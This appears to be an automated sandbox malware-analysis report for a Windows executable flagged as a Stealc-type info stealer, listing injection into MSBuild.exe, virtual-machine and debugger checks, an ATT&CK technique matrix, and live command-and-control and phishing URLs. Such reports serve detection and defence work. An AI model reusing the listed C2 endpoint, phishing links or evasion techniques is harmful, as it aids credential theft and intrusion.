                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeAPI coverage: 4.1 %
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FF9ABF FindFirstFileExW,0_2_00FF9ABF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00401160 GetSystemInfo,3_2_00401160
                        Source: Amcache.hve.7.drBinary or memory string: VMware
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE7922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004045C0 VirtualProtect ?,00000004,00000100,000000003_2_004045C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041C03D
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h]0_2_00FE2003
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h]0_2_00FFA64C
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_01026628 mov eax, dword ptr fs:[00000030h]0_2_01026628
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h]0_2_00FF0F2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00419750 mov eax, dword ptr fs:[00000030h]3_2_00419750
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FFCC4B GetProcessHeap,0_2_00FFCC4B
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FE7610
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE7922
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE7AAF SetUnhandledExceptionFilter,0_2_00FE7AAF
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FEDA73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041AD48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041CEEA SetUnhandledExceptionFilter,3_2_0041CEEA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041B33A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory protected: page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00FFC085
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetLocaleInfoW,0_2_00FF622B
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: EnumSystemLocalesW,0_2_00FFC372
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: EnumSystemLocalesW,0_2_00FFC327
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00FFC498
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: EnumSystemLocalesW,0_2_00FFC40D
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetLocaleInfoW,0_2_00FFC6EB
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00FFC814
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00FFC9E9
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: GetLocaleInfoW,0_2_00FFC91A
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: EnumSystemLocalesW,0_2_00FF5D7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\1f13Cs1ogc.exeCode function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FE7815
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00417850 GetUserNameA,3_2_00417850
                        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        311
                        Process Injection
                        1
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Virtualization/Sandbox Evasion
                        LSASS Memory41
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable Media2
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                        Disable or Modify Tools
                        Security Account Manager1
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                        Process Injection
                        NTDS1
                        Account Discovery
                        Distributed Component Object ModelInput Capture13
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        System Owner/User Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials1
                        File and Directory Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Software Packing
                        DCSync23
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528301 Sample: 1f13Cs1ogc.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 23 Suricata IDS alerts for network traffic 2->23 25 Found malware configuration 2->25 27 Antivirus / Scanner detection for submitted sample 2->27 29 7 other signatures 2->29 6 1f13Cs1ogc.exe 1 2->6         started        process3 signatures4 31 Writes to foreign memory regions 6->31 33 Allocates memory in foreign processes 6->33 35 Injects a PE file into a foreign processes 6->35 9 MSBuild.exe 13 6->9         started        12 WerFault.exe 19 16 6->12         started        15 MSBuild.exe 6->15         started        17 MSBuild.exe 6->17         started        process5 dnsIp6 21 62.204.41.150, 49704, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 9->21 19 C:\ProgramData\Microsoft\...\Report.wer, Unicode 12->19 dropped file7

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        1f13Cs1ogc.exe32%ReversingLabsWin32.Trojan.Generic
                        1f13Cs1ogc.exe100%AviraHEUR/AGEN.1310458
                        1f13Cs1ogc.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://upx.sf.net0%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        199.232.214.172
                        truefalse
                          unknown
                          s-part-0036.t-0009.t-msedge.net
                          13.107.246.64
                          truefalse
                            unknown
                            fp2e7a.wpc.phicdn.net
                            192.229.221.95
                            truefalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://62.204.41.150/true
                                unknown
                                http://62.204.41.150/edd20096ecef326d.phptrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://upx.sf.netAmcache.hve.7.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://62.204.41.150tMSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.150MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmptrue
                                      unknown
                                      http://62.204.41.150/bJMSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://62.204.41.150/edd20096ecef326d.php5MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://62.204.41.150/jMSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://62.204.41.150~MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              62.204.41.150
                                              unknownUnited Kingdom
                                              30798TNNET-ASTNNetOyMainnetworkFItrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1528301
                                              Start date and time:2024-10-07 18:45:10 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 4m 55s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:1f13Cs1ogc.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:be961e1299e54c9a50c773db0dc3696c.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/5@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 20
                                              • Number of non-executed functions: 66
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.190.160.22, 40.126.32.68, 40.126.32.76, 40.126.32.136, 20.190.160.14, 40.126.32.138, 40.126.32.72, 20.190.160.17, 199.232.214.172, 192.229.221.95, 20.109.210.53, 20.3.187.198, 20.189.173.21, 52.165.164.15, 93.184.221.240
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                              • VT rate limit hit for: 1f13Cs1ogc.exe
                                              TimeTypeDescription
                                              12:46:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              62.204.41.1505rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.150/edd20096ecef326d.php
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.150/edd20096ecef326d.php
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              s-part-0036.t-0009.t-msedge.netVLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 13.107.246.64
                                              https://fenster-mark-gmbhsharefile.btn-ebikes.com/Get hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              gIXLkTvFeC.exeGet hashmaliciousVidarBrowse
                                              • 13.107.246.64
                                              https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              https://kohlhage-de.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                                              • 13.107.246.64
                                              http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.htmlGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              https://www.office365.murnau.org/_/l0g1n0Get hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.64
